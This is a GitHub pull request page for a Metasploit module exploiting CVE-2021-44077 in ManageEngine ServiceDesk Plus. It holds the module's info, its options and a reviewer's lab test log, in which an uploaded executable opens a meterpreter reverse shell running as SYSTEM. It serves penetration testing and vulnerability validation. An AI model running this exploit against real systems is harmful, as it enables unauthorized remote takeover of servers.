Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit #15950

Merged
merged 2 commits into from
Dec 23, 2021
Merged

Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit #15950

merged 2 commits into from
Dec 23, 2021

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Dec 9, 2021
edited
Loading 

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > info

       Name: ManageEngine ServiceDesk Plus CVE-2021-44077
     Module: exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
   Platform: Windows
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-09-16

Provided by:
  wvu <wvu@metasploit.com>
  Y4er

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2021-44077, an unauthenticated remote code
  execution vulnerability in ManageEngine ServiceDesk Plus, to upload
  an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that
  build 11305 is vulnerable to the authentication bypass but not the
  file upload. The module will check for an exploitable build.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-44077
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above
  https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021
  https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
  https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
  https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis
  https://xz.aliyun.com/t/10631

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) >

@wvu wvu added the module label Dec 9, 2021
@wvu
Copy link
Contributor Author

wvu commented Dec 11, 2021

Well, Log4j really blew up. I'll get back to this soon.

@wvu
Copy link
Contributor Author

wvu commented Dec 20, 2021

Back on this today. :)

@wvu wvu added the docs label Dec 23, 2021
@wvu wvu changed the title [WIP] Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit Dec 23, 2021
@wvu wvu marked this pull request as ready for review December 23, 2021 01:47
@wvu wvu force-pushed the feature/manageengine branch 6 times, most recently from b0f3c69 to a2955b0 Compare December 23, 2021 18:09
@wvu
Copy link
Contributor Author

wvu commented Dec 23, 2021

All right, I think I'm done making fixes and improvements. 😅

@bwatters-r7 bwatters-r7 self-assigned this Dec 23, 2021
@wvu wvu mentioned this pull request Dec 23, 2021
Closed
@bwatters-r7
Copy link
Contributor

Here's an exe, would it be too much trouble to have you execute it as SYSTEM? Sweet, thanks.

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > show options

Module options (exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.132.101     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                         it
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST                        yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Dropper


msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set verbose true
verbose => true
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /RestAPI/ImportTechnicians is present.
[*] Uploading msiexec.exe
[+] Successfully uploaded msiexec.exe
[*] Executing msiexec.exe
[!] Yo, don't forget to clean up ..\bin\msiexec.exe
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:50017 ) at 2021-12-23 14:37:55 -0600

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@bwatters-r7 bwatters-r7 merged commit b8137d5 into rapid7:master Dec 23, 2021
@bwatters-r7
Copy link
Contributor

Release Notes

This module exploits CVE-2021-44077, an unauthenticated remote code
execution vulnerability in ManageEngine ServiceDesk Plus, to upload
an EXE (msiexec.exe) and execute it as the SYSTEM account.

@wvu wvu deleted the feature/manageengine branch December 23, 2021 21:05
@erran-r7 erran-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 7, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wvu @bwatters-r7 @erran-r7